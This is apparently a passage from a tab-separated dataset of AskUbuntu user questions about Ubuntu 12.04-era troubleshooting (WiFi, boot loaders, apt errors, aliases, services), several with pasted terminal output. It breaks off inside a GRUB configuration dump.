160734	wifi disabled on dell inspiron mini 10 ( 1018 )	my netbook can not access the wifi network , and i can not enable it . this is the second time this has happenned . the first time , it came back after a lot of restarts and bios factory resets . ubuntu sometimes simply wo n't connect to any wifi networks , and other times it will say that the wireless is blocked by a hardware switch . i have tried pressing f2 and doing a bios reset , with no luck . sudo rfkill list all gives : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes
160738	function keys are not working on samsung np300	i am using ubuntu 12.04 from last week . this model of samsung has fn key , when used with f1 - f8 , it can control brightness , volume and some other stuff . everything was working perfectly . few minutes ago , i locked computer by ctrl + alt + l and started cleaning up the keyboard . when i logged back in , the f1 - f8 keys are working for controlling laptop features and they wo n't work for what they actually are.. i.e . alt + f4 does n't work anymore . alt + ctrl + f1 to switch to tty1 does n't work . it seems like , the fn key is recorded as 'pressed ' in the system . how do i resolve this ?
160740	**wired** network disconnects when laptop unplugged	i am using xubuntu 12.04 with network manager on my hp 5310m laptop and get a weird problem on wired network . when googling for answers , i found many people get the problem that wireless disconnects when laptop unplugged . for example , this question : wireless disconnects when laptop unplugged from power source however , my problem is that my wired network of my laptop will auto disconnect when unplugged from a power source . now if i want to use wired network , i must have my laptop plugged . if someone unplugged the power source of my laptop , my network connection will lost at the same time . i think this may be some kind of `` power-save '' method but i searched /etc/pm-utils/power.d/ without find anything about wired network . can anyone help ?
160745	how to find history of shell commands since machine was created ?	i created an ubuntu virtualbox machine a couple weeks ago and have been working on projects off and on in it since then . now i would like to find the syntax of some commands i typed in the terminal a week ago , but i have opened and closed the terminal window and restarted the machine numerous times . how can i get the history command to go back to the first command i typed after i created the machine , or is there another place that all the commands are stored in ubuntu ?
160749	ubuntu server 11.10 from usb ?	i tried 'burning ' the .iso onto a usb like i normally would with ubuntu desktop or server 12.04 , but it gives me an error during installation and tells me that it ca n't get files from cd or something . so , is a usb installation of server 11.10 not possible ? p.s . i need to install 11.10 because 12.04 is giving me a lot of problems trying to convert to a static ip .
160755	wubi installation error- can not unpack wubi.exe	i was trying to download ubuntu on windows installer mode . i downloaded the wubi.exe file and when i ran it , it said can not unpack c : \users\dell\downloads\wubi.exe . what should i do ?
160758	how do i enable the apparmor profile for firefox ?	recently there an article in about configuring ff with apparmor . when i ran the below command cat /etc/apparmor.d/usr.bin.firefox | sudo apparmor_parser –a i get the following error error : could not read profile –a : no such file or directory . how to get rid of this error ? also , i don’t use the ff which comes with ubuntu , but i download latest ff and start using it . what changes to the command are required ?
160762	how to show a missing bootloader ?	i do n't have a bootloader . there 's just a grub terminal-like interface and apparently , linux terminal commands ( e.g . exit , shutdown , poweroff ) do n't work on it so i do n't know what to do with it . i have windows 8 and ubuntu 12.04 ( both 64bit ) installed on the partitions of my laptop .
160764	how to retrieve a list of devices connected to ubuntu one ?	is there is an api to retrieve the list of devices connected to the ubuntu one service ?
160767	problem in matlab installation with java ( install : 1 : eval : permission denied )	i executed this command in a terminal by going to the folder where i placed the installation file . santiago @ chapa : ~/descargas/matlab/matlab $ sudo sh install but this showed in the terminal preparing installation files ... installing ... install : 1 : eval : /tmp/mathworks_6992/sys/java/jre/glnx86/jre/bin/java : permission denied can anyone help me ?
160769	stack docklet in ubuntu 12.04 unity	i remember that ubuntu with gnome 2.3 was having an awesome app called `` docky '' . it was great but unity is much better for me now , so i 'm just asking if there 's any way to make a stack docklet like this in this photo . thanks .
160770	is it a good idea to place app configuration files into `` ~/ubuntu one '' folder ?	in order to keep certain settings in sync , is it a good idea to place app configuration files into ~/ubuntu one folder , e.g . ~/ubuntu one/.myapp/myapp.conf ?
160774	how to troubleshoot quickly packaging failures	i have created a quickly app and i 'm trying to create a package for distributing it through the software center . however , whenever i try one of the quickly packaging commands ( package , share , release or submitubuntu ) , it fails without telling me exactly why . how can i troubleshoot the packaging failure so i can either investigate it or ask for help about it ?
160778	how to uninstall postgresql properly ?	i have messed around with the template1 database , and would like to reset everything as it was . hence i have done a sudo apt-get purge postgresql however the next time i reinstalled it , the databases are still there . why ? nothing has been reset .
160781	what are the steps for using axel-kapt in ubuntu 12.04 ?	i have downloaded axel-kapt and also installed it through ubuntu software center . but now i do n't know how to use axel-kapt , so please tell me how to use it with proper steps .
160782	`` no gpg key set matching launchpad one found '' when uploading app using quickly	i`m trying to upload my app using quickly , but usually getting this error : no gpg key set matching launchpad one found how to solve this problem ?
160788	what is the best tool for working with oracle db ?	what is the best data management application for working with oracle db ?
160789	aliases do n't work after restart terminal	i have create few new aliases in ~/.bashrc then run source ~/.bashrc and it worked . but after restart terminal it does not work . i looked back and found the advice : create ~/.bash_aliases and in ~/.bashrc append string : if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi but the problem remains unsolved . any suggestions ?
160790	ca n't update 12.04 getting package header error	i originally posted this question , and was redirected to another thread where the question had already been asked . i then posted to that thread and had my post deleted by moderator fossfreedom , and told to post a `` new '' question ... so whatever ... . i do n't care if it 's old or new i just need help here people ! in a nutshell , i ca n't use sudo apt-get update or the gui update tool to update my system . anytime i try using either tool it gives me an error about packages missing headers . i ca n't send error reports , i have tried all the listed solutions from this post : i ca n't update my system properly , `` no package header '' error and from this post : how do i fix a `` problem with mergelist '' error when trying to do an update ? and neither work . i just want a working solution since i do n't have the means of re-installing the os entirely , and i really do n't want to have to go back to using windows . output from my terminal when running sudo apt-get update joel @ joel-laptop : ~ $ sudo apt-get update [ sudo ] password for joel : ign http : //extras.ubuntu.com precise inrelease get:1 http : //extras.ubuntu.com precise release.gpg [ 72 b ] get:2 http : //extras.ubuntu.com precise release [ 11.9 kb ] ign http : //ca.archive.ubuntu.com precise inrelease ign http : //ca.archive.ubuntu.com precise-updates inrelease ign http : //ca.archive.ubuntu.com precise-backports inrelease ign http : //archive.canonical.com precise inrelease ign http : //ca.archive.ubuntu.com precise-security inrelease get:3 http : //ca.archive.ubuntu.com precise release.gpg [ 198 b ] get:4 http : //extras.ubuntu.com precise/main sources [ 1,020 b ] hit http : //archive.canonical.com precise release.gpg get:5 http : //ca.archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:6 http : //ca.archive.ubuntu.com precise-backports release.gpg [ 198 b ] hit http : //archive.canonical.com precise release get:7 http : //ca.archive.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //archive.canonical.com precise/partner sources get:8 http : //ca.archive.ubuntu.com precise release [ 49.6 kb ] hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages get:9 http : //extras.ubuntu.com precise/main amd64 packages [ 1,232 b ] get:10 http : //extras.ubuntu.com precise/main i386 packages [ 1,229 b ] ign http : //extras.ubuntu.com precise/main translationindex ign http : //archive.getdeb.net oneiric-getdeb inrelease ign http : //archive.canonical.com precise/partner translationindex hit http : //archive.getdeb.net oneiric-getdeb release.gpg ign http : //extras.ubuntu.com precise/main translation-en_ca get:11 http : //ca.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //extras.ubuntu.com precise/main translation-en ign http : //archive.canonical.com precise/partner translation-en_ca hit http : //archive.getdeb.net oneiric-getdeb release ign http : //archive.canonical.com precise/partner translation-en hit http : //archive.getdeb.net oneiric-getdeb/apps sources get:12 http : //ca.archive.ubuntu.com precise-backports release [ 49.6 kb ] hit http : //archive.getdeb.net oneiric-getdeb/apps amd64 packages hit http : //archive.getdeb.net oneiric-getdeb/apps i386 packages ign http : //archive.getdeb.net oneiric-getdeb/apps translationindex get:13 http : //ca.archive.ubuntu.com precise-security release [ 49.6 kb ] get:14 http : //ca.archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:15 http : //ca.archive.ubuntu.com precise/main sources [ 934 kb ] ign http : //archive.getdeb.net oneiric-getdeb/apps translation-en_ca ign http : //archive.getdeb.net oneiric-getdeb/apps translation-en get:16 http : //ca.archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:17 http : //ca.archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:18 http : //ca.archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:19 http : //ca.archive.ubuntu.com precise/main amd64 packages [ 1,273 kb ] get:20 http : //ca.archive.ubuntu.com precise/restricted amd64 packages [ 8,452 b ] get:21 http : //ca.archive.ubuntu.com precise/universe amd64 packages [ 4,786 kb ] get:22 http : //ca.archive.ubuntu.com precise/multiverse amd64 packages [ 119 kb ] get:23 http : //ca.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:24 http : //ca.archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:25 http : //ca.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:26 http : //ca.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //ca.archive.ubuntu.com precise/main translationindex hit http : //ca.archive.ubuntu.com precise/multiverse translationindex hit http : //ca.archive.ubuntu.com precise/restricted translationindex hit http : //ca.archive.ubuntu.com precise/universe translationindex get:27 http : //ca.archive.ubuntu.com precise-updates/restricted sources [ 1,379 b ] get:28 http : //ca.archive.ubuntu.com precise-updates/main sources [ 124 kb ] get:29 http : //ca.archive.ubuntu.com precise-updates/multiverse sources [ 1,058 b ] get:30 http : //ca.archive.ubuntu.com precise-updates/universe sources [ 30.6 kb ] get:31 http : //ca.archive.ubuntu.com precise-updates/main amd64 packages [ 311 kb ] get:32 http : //ca.archive.ubuntu.com precise-updates/restricted amd64 packages [ 2,417 b ] get:33 http : //ca.archive.ubuntu.com precise-updates/universe amd64 packages [ 85.2 kb ] get:34 http : //ca.archive.ubuntu.com precise-updates/multiverse amd64 packages [ 1,829 b ] get:35 http : //ca.archive.ubuntu.com precise-updates/main i386 packages [ 314 kb ] get:36 http : //ca.archive.ubuntu.com precise-updates/restricted i386 packages [ 2,439 b ] get:37 http : //ca.archive.ubuntu.com precise-updates/universe i386 packages [ 85.7 kb ] get:38 http : //ca.archive.ubuntu.com precise-updates/multiverse i386 packages [ 2,047 b ] hit http : //ca.archive.ubuntu.com precise-updates/main translationindex get:39 http : //ca.archive.ubuntu.com precise-updates/multiverse translationindex [ 71 b ] get:40 http : //ca.archive.ubuntu.com precise-updates/restricted translationindex [ 71 b ] get:41 http : //ca.archive.ubuntu.com precise-updates/universe translationindex [ 73 b ] get:42 http : //ca.archive.ubuntu.com precise-backports/main sources [ 1,845 b ] get:43 http : //ca.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:44 http : //ca.archive.ubuntu.com precise-backports/universe sources [ 11.1 kb ] get:45 http : //ca.archive.ubuntu.com precise-backports/multiverse sources [ 1,383 b ] get:46 http : //ca.archive.ubuntu.com precise-backports/main amd64 packages [ 1,271 b ] get:47 http : //ca.archive.ubuntu.com precise-backports/restricted amd64 packages [ 14 b ] get:48 http : //ca.archive.ubuntu.com precise-backports/universe amd64 packages [ 9,701 b ] get:49 http : //ca.archive.ubuntu.com precise-backports/multiverse amd64 packages [ 996 b ] get:50 http : //ca.archive.ubuntu.com precise-backports/main i386 packages [ 1,271 b ] get:51 http : //ca.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:52 http : //ca.archive.ubuntu.com precise-backports/universe i386 packages [ 9,703 b ] get:53 http : //ca.archive.ubuntu.com precise-backports/multiverse i386 packages [ 999 b ] get:54 http : //ca.archive.ubuntu.com precise-backports/main translationindex [ 71 b ] get:55 http : //ca.archive.ubuntu.com precise-backports/multiverse translationindex [ 71 b ] get:56 http : //ca.archive.ubuntu.com precise-backports/restricted translationindex [ 70 b ] get:57 http : //ca.archive.ubuntu.com precise-backports/universe translationindex [ 72 b ] get:58 http : //ca.archive.ubuntu.com precise-security/restricted sources [ 14 b ] get:59 http : //ca.archive.ubuntu.com precise-security/main sources [ 22.5 kb ] get:60 http : //ca.archive.ubuntu.com precise-security/multiverse sources [ 713 b ] get:61 http : //ca.archive.ubuntu.com precise-security/universe sources [ 7,832 b ] get:62 http : //ca.archive.ubuntu.com precise-security/main amd64 packages [ 67.8 kb ] get:63 http : //ca.archive.ubuntu.com precise-security/restricted amd64 packages [ 14 b ] get:64 http : //ca.archive.ubuntu.com precise-security/universe amd64 packages [ 18.8 kb ] get:65 http : //ca.archive.ubuntu.com precise-security/multiverse amd64 packages [ 1,155 b ] get:66 http : //ca.archive.ubuntu.com precise-security/main i386 packages [ 70.2 kb ] get:67 http : //ca.archive.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:68 http : //ca.archive.ubuntu.com precise-security/universe i386 packages [ 19.0 kb ] get:69 http : //ca.archive.ubuntu.com precise-security/multiverse i386 packages [ 1,394 b ] hit http : //ca.archive.ubuntu.com precise-security/main translationindex hit http : //ca.archive.ubuntu.com precise-security/multiverse translationindex hit http : //ca.archive.ubuntu.com precise-security/restricted translationindex hit http : //ca.archive.ubuntu.com precise-security/universe translationindex hit http : //ca.archive.ubuntu.com precise/main translation-en_ca hit http : //ca.archive.ubuntu.com precise/main translation-en hit http : //ca.archive.ubuntu.com precise/multiverse translation-en hit http : //ca.archive.ubuntu.com precise/restricted translation-en hit http : //ca.archive.ubuntu.com precise/universe translation-en_ca hit http : //ca.archive.ubuntu.com precise/universe translation-en hit http : //ca.archive.ubuntu.com precise-updates/main translation-en get:70 http : //ca.archive.ubuntu.com precise-updates/multiverse translation-en [ 912 b ] get:71 http : //ca.archive.ubuntu.com precise-updates/restricted translation-en [ 798 b ] get:72 http : //ca.archive.ubuntu.com precise-updates/universe translation-en [ 51.1 kb ] hit http : //ca.archive.ubuntu.com precise-backports/main translation-en hit http : //ca.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //ca.archive.ubuntu.com precise-backports/restricted translation-en hit http : //ca.archive.ubuntu.com precise-backports/universe translation-en hit http : //ca.archive.ubuntu.com precise-security/main translation-en hit http : //ca.archive.ubuntu.com precise-security/multiverse translation-en hit http : //ca.archive.ubuntu.com precise-security/restricted translation-en hit http : //ca.archive.ubuntu.com precise-security/universe translation-en fetched 20.0 mb in 1h 25min 32s ( 3,891 b/s ) reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ca.archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en e : the package lists or status file could not be parsed or opened .
160797	wubi ubuntu 12.04 boot , no kernel , gnu grub , nothing works	yesterday my ubuntu 12.04 ( wubi ) system was working completely fine . but today when i tried to boot i was brought to a gnu grub screen . typing boot yields no kernel specified or something along those lines . after going through many forums and q/a sites and typing many lines of code into the grub > terminal , i have gotten nowhere . most of what i type returns something about the kernel not being found and an i have no way of finding out my kernel version . i am dual-booting alongside vista and have also tried replacing wubildr . my root.dsk is also present so that is not an issue as many websites state . any help would be good and if more information is needed i will try and find it out .
160802	i enabled the root account by mistake , how do i disable it ?	i wanted to change my own password , but instead of using sudo passwd myuser , i used sudo passwd by mistake , and so i set the password for root . does that mean that my root account is enabled now ? i know that it 's supposed to be disabled in ubuntu . what steps should i take to disable it again ? it 's currently set to the same password as my own user account , and it 's kind of redundant , because my user is in the sudoers list anyway .
160808	do i need to use refit if i want to install ubuntu on a macbook pro ?	i am considering getting the new macbook pro and dual-booting os x and ubuntu . all the help pages i found say i need to use refit but is that really necessary ? ca n't i just use the default os choose thing macs already have preinstalled , because refit is just really ugly in comparison to that .
160810	why are intel hd 3000 graphics ( sandy bridge ) detected as unknown ?	when i go into system information when i check system it shows the graphics as : unknown
160812	20 to 40 seconds pause during the boot on 12.04	i 've just installed new asrock b75m-itx mainboard and fresh ubuntu 12.04 on it . during the boot , there is a 20 to 40 seconds pause when goa-daemon is starting ( /var/log/syslog ) : jul 7 11:13:28 sirius goa [ 1933 ] : goa-daemon version 3.4.0 starting [ main.c:112 , main ( ) ] jul 7 11:13:51 sirius kernel : [ 102.771893 ] ata3.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen any ideas what is wrong and how should i proceed trouble-shooting this ? edit : thank you for the tip regarding ata . i 've found following in the logs : jul 8 10:54:20 sirius kernel : [ 6.007532 ] ata1 : link is slow to respond , please be patient ( ready=0 ) jul 8 10:54:20 sirius kernel : [ 10.648618 ] ata1 : comreset failed ( errno=-16 ) the problem vanished when i 've reconnected the intel g1 ssd from sata3 to sata2 connector .
160813	where should i save temporary files of the app i am developing ?	i am developing an app for the ubuntu app showdown 2012 , say `` myapp '' . it needs to download files from the web , store them temporarily and then read them . where should i save those filesâ ? now i do it in /tmp/myapp/ , so this path is `` hard coded '' in my code . would the answer to my question be changed if i also need to modify/write into those temporary filesâ ?
160814	why ca n't i install utorrent server on ubuntu ?	i 've seen a detailed tutorial on installing u-torrent but after i enter , last line of code , it says : 'bash : /usr/bin/utserver : no such file or directory' syntax ; utserver -settingspath /opt/utorrent-server-v3_0/
160818	having tried differen ways but none worked - how do i disable a service from auto-start at boot in ubuntu ?	this really does n't make sense . i 've been using many other distros and never had such difficulty managing autostart services . i found three ways of disabling autostart services , and none of them works for me : update-rc.d -f service_name remove chkconfig -- level 12345 service_name off sysv-rc-conf i tried all the three ways to disable mysql daemon , mongo daemon , redis server , cups daemon , yet all of the utilities confirmed that the daemons are disabled , yet they still automatically start on boot . please suggest the most correct way to disable services from auto-start at boot . thank you ! btw , it 's running 12.04
160821	screencast not producing files	i 'm using gnome 3 on 12.04 and trying to create a screencast . i start the screencast using the ctrl-alt-shift-r shortcut and the red light appears in the bottom right corner . i go about my business then press the key combination again when done . the problem is that the screencast file gets generated maybe 1 out of 10 times . is there a log file i can look at to determine the issue ? how about a settings file ? update : i did some additional testing . what 's happening is that the screencast does work but it appends the new video to the existing file . even if the file is renamed or moved to trash . emptying trash does not create a new file either . not sure where the video gets recorded to then . the only reliable way i 've found to have a new file created is to log out of the session and log back in . is this expected behaviour ? is there a way to force screencast to create a new file every time ctrl-alt-shift-r is pressed ?
160830	minimal lamp iptables setup	what rules are needed for an ubuntu lamp server only having minimum necessary ports open .
160831	where do i find wireless drivers for ndiswrapper , for a ralink card ?	i have some problems with wifi at my lenovo z575 . under win 7 wifi works fine , so i wanted to install exactly the same drivers under ubuntu with ndiswrapper . my question is : where the drivers are located under win 7 ? i tried to download the drivers from the vendor 's site ( ralink ) but with the downloaded drivers i still have some problems
160832	how to make the terminal export a specific environment variable at every load ?	i would like to run the script ps1= '' ┌─ [ \u @ \h : ] \n└─ > `` in the terminal every time it 's opened , but i ca n't figure out how to .
160843	why do the `` iodbc '' and `` libmyodbc '' packages conflict with each other ?	when i install iodbc the libmyodbc package is removed , and i do n't understand why . does anyone have an explanation ?
160845	how can i create partitions on ubuntu 12.04 lts and gparted dont work	i have been trying to create ntsf partitions inside ubuntu to install my windows 7 ultimate edition back but gparted dont work or at least dont let me do anything on this version of ubuntu ( 12.04 lts 32 bits ) and i dont want to wipe the drive to install windows back and then install ubuntu in dual boot because is the same im trying to do but doing it is a longer process
160849	file encryption that root can not read	i have regular user access to a friend 's root server . i can put my data there and he ( as a normal user ) could not read my data , but with the root account he could . if i use something like en encrypted home folder , he could still read the data when i am logged in . is there some way to protect the data in a way that only i can read it and not root ?
160860	is it relatively safe to install kernel from `` canonical kernel team ppa '' than `` mainline ''	i already referred most of the questions stating upgrade from mainline builds or compiling from latest source or ppa and also concluded that it can cause breakage to current stable installed system . my question is regarding the kernel builds from canonical kernel team which i have subscribed in ubuntu 12.04 64-bit , states this is the core kernel team as hired by canonical . do not use this team , use ubuntu-kernel-team instead . my stable kernel states 3.2.0-27.42 from ubuntu repository , also i consider canonical kernel team to be official , currently urging me to upgrade 3.2.0-27.43 , so from the odd numbered and through the ppa description it is categorized as unstable . from this , it can be said next stable release would be 3.2.0-27.44 . is upgrading to .43 version is stable enough to continue , since .44 will be provide by ubuntu itself based on .43 version and so on . though i ca n't expect a lot of changes , but does it provide new improvements or just bug fixes since it is just a preceding release . also , apart from ubuntu mainline kernel , is canonical kernel team different . if so , in what development or contribution terms . is the ubuntu kernel developed by two different teams or same team . p.s . : just noticed that sudo apt-get update & & sudo apt-get upgrade provides me upgrade to .43 kernel , which normally requires sudo apt-get dist-upgrade to upgrade to newer kernel available , unless it normally provides message like `` following packages were not upgraded ... '' , is it an error or an exception to this canonical kernel ppa . heres the apt-config dump
160861	gnome terminal is not running source .bashrc ?	i have a clean installation of ubuntu 12 and i installed bashmarks , a utility to have favorites folders on the terminal . one of the steps is to include source ~/.local/bin/bashmarks.sh at the end of ~/.bashrc , so each time you open a terminal it loads bashmarks . if i run source manually it starts working , but when i open a terminal is not sourced automatically .
160865	recover ext4 partition from interrupted resize	world ! [ that 's funny , it automatically takes out leading `` hello '' s ] i 'm installing ubuntu on a friend 's laptop , and i encountered a problem while resizing the ubuntu partition . i was expanding it to the left ( move and resize ) , but the process was interrupted while it was performing the actual data copying . gparted says the partition is corrupted and the filesystem ca n't be read . now , i 'm not worried about reinstalling . the problem is that i had already copied some of the files over from the windows partition . how can i resume the copying process ? here 's what gparted says about it : filesystem volume name : < none > last mounted on : / filesystem uuid : [ tl ; dt ] filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal_ext_attr_resize_inode dir_index filetype extent flex_bg sparse_super large_file default mount options : user_xattr acl filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 1155072 block count : 4619008 reserved block count : 230950 free blocks : 764535 free inodes : 968259 first block : 0 block size : 4096 fragment size : 4069 reserved gdt blocks : 1022 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 ... first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 ... journal superblock magic number invalid ! unable to read the contents of this filesystem ! ... one particular thing that intrigues me is the has_journal_ext_attr_resize_inode attribute under filesystem features . it 's as though it knows it was in the middle of a resize . just a guess .
160869	need to downsample video to a lower resolution	i would like to convert a mp4 file in hd into a mp4 file of lower resolution . is there any software that can be used for this ?
160870	windows 7 not loading from grub , ubuntu 12.04 dual boot	i have the results of my boot script run here : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi /efi/ubuntu/grubx64.efi sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab sda7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' sdb2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 976,773,167 976,773,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 411,647 409,600 efi system partition /dev/sda2 411,648 673,791 262,144 microsoft reserved partition ( windows ) /dev/sda3 673,792 391,383,039 390,709,248 data partition ( windows/linux ) /dev/sda4 391,383,040 657,863,679 266,480,640 data partition ( windows/linux ) /dev/sda5 924,344,320 976,773,119 52,428,800 windows recovery environment ( windows ) /dev/sda6 657,863,680 916,189,851 258,326,172 data partition ( windows/linux ) /dev/sda7 916,189,852 924,344,319 8,154,468 swap partition ( linux ) drive : sdb _____________________________________________________________________ disk /dev/sdb : 32.0 gb , 32017047552 bytes 256 heads , 63 sectors/track , 3877 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sdb1 ends after the last sector of /dev/sdb guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 8,392,704 62,531,583 54,138,880 - /dev/sdb2 2,048 8,390,655 8,388,608 - '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 a444-e7db vfat system /dev/sda3 0eec3e6eec3e5067 ntfs os /dev/sda4 46da0687da067409 ntfs data /dev/sda5 b6ba44f7ba44b621 ntfs recovery /dev/sda6 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e ext4 /dev/sda7 f0e890f9-acd1-4ee0-89b7-d2f1d0525247 swap ================================ mount points : ================================= device mount_point type options /dev/sda1 /boot/efi vfat ( rw ) /dev/sda6 / ext4 ( rw , errors=remount-ro ) =========================== sda6/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod efi_gop insmod efi_uga insmod video_bochs insmod video_cirrus } insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e set locale_dir= ( $ root ) /boot/grub/locale set lang=en_ca insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-26-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e linux /boot/vmlinuz-3.2.0-26-generic root=uuid=9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e ro quiet splash pcie_aspm=force $ vt_handoff initrd /boot/initrd.img-3.2.0-26-generic } menuentry 'ubuntu , with linux 3.2.0-26-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e echo 'loading linux 3.2.0-26-generic ... ' linux /boot/vmlinuz-3.2.0-26-generic root=uuid=9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-26-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.2.0-23-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e linux /boot/vmlinuz-3.2.0-23-generic root=uuid=9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e ro quiet splash pcie_aspm=force $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic } menuentry 'ubuntu , with linux 3.2.0-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd0 , gpt6 ) ' search -- no-floppy -- fs-uuid -- set=root 9ed25e19-3ede-4af3-9b4c-4c35c1c54e2e echo 'loading linux 3.2.0-23-generic ... ' linux 